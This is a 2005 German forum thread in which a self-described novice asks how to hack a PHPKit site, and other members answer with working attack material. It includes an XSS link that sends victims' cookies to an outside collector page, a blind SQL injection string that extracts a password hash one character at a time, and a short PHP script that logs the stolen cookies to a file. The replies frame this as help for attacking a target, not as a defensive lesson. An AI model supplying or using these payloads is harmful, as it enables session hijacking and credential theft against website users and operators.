[Suche] Wie exploite ich ein PHPKit ?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von HaCkKiddiE, 18. August 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 18. August 2005
    Hi

    Ich suche n Tutorial wie man nem PHPKIT exploitet (hackt)

    Danke
     

  2. Anzeige
  3. #2 18. August 2005
    so wie du das schreibst willst du ein explitet hacken ? was hat das für ein sinn ?
     
  4. #3 18. August 2005
    ^^ hat recht
    ein exploit ist nur ein fehler in der software/programm
    erst durch diesen fehler hat man eine angriffsfläche und kann einen hackversuch internehmen

    es gibt im netz genug seiten die exploits auflisten musst nur nach deiner version suchen und schauen ob sie mit der zuhackenden version übereinstimmt und hoffen dass sie noch nicht geupdated wurde
     
  5. #4 18. August 2005
    ja und wenn ich dann die exploits habe....

    wie hacke ich dann sowas ?
    z.B:
    Code:
    www.target.de/popup.php?img="><script>alert(document.cookie)</script>
     
  6. #5 18. August 2005
    Hierbei handelt es sich um XSS oder auch Cross-Site-Scripting genannt.

    Du musst anstelle von <script>alert(document.cookie)</script> ein Script einfügen welches die Cookies der Benutzer stielt und dann dein Opfer dazu bringen dass es den Link verwendet.
     
  7. #6 19. August 2005
    und was muss ich da jetzt genau eingeben ?



    Und wie siehsts mit dieser Methode aus ?

    Code:
    phpkit/include.php?path=guestbook/print.php&id=1
     
  8. #7 19. August 2005
    Code:
    www.target.de/popup.php?img="><img width=0 height=0 src="javascript:document.images[0].src='http://meineseite.de/cookiedieb.php?cookie=' document.cookie">
    
    1. du hast etwas vergessen:

    phpkit/include.php?path=guestbook/print.php&id=1'

    phpkit/include.php?path=guestbook/print.php&id=1' OR (userid=1 AND ascii(substring(password,$i,1))=$num)/*

    und so per SQL-Injection sich die einzelnen Zeichen des PW-Hashes ausgeben lassen.
     
  9. #8 19. August 2005
    Code:
    phpkit/include.php?path=guestbook/print.php&id=1'
    aber wenn ich das einfüge sehe ich nur einen leeren gästebuch eintrag ?

    ---------------------------------------------------------------------------------------------------




    Code:
    phpkit/include.php?path=guestbook/print.php&id=1' OR (userid=1 AND ascii(substring(password,$i,1))=$num)/*
    und wie genau soll das hier funktionieren ?

    PS: Danke schonmal..xodox.. :D
    hast n 10ner



    -----------------------------------------------------------------------------------------------------

    Code:
    popup.php?img="><img width=0 height=0 src="javascript:document.images[0].src='http://meineseite.de/cookiedieb.php?cookie=' document.cookie">
    wie müsste dann die cookiediep.php aussehen ?
     
  10. #9 19. August 2005
    Alles werde ich sicher nicht verraten..

    Suchfunktion: sql-injection wirst einige tutorials finden.
     
  11. #10 20. August 2005
    Benutzer ruft den link auf => Browser versucht das Bild zu laden und hängt an die Anfrage den Cookie an, welchen du dann mittels z.B.

    Code:
    <?
    error_reporting
    (E_ALL ^ E_NOTICE);
    $cookie = $_REQUEST[cookie];
    $fic=fopen("cookies.txt", "a");
    fwrite($fic, "$cookie\n");
    fclose($fic);
    ?>
    
    abfangen kannst.
     

  12. Videos zum Thema
Die Seite wird geladen...
Similar Threads - exploite PHPKit
  1. Boerse.BZ eXploited

    MantiCore , 15. August 2010 , im Forum: Szene News
    Antworten:
    38
    Aufrufe:
    6.900
  2. Joomla exploiten

    windose , 16. März 2010 , im Forum: Sicherheit & Datenschutz
    Antworten:
    2
    Aufrufe:
    928
  3. Antworten:
    1
    Aufrufe:
    492
  4. Antworten:
    0
    Aufrufe:
    309
  5. Exploiten

    Chrisomator , 22. Dezember 2006 , im Forum: Sicherheit & Datenschutz
    Antworten:
    9
    Aufrufe:
    585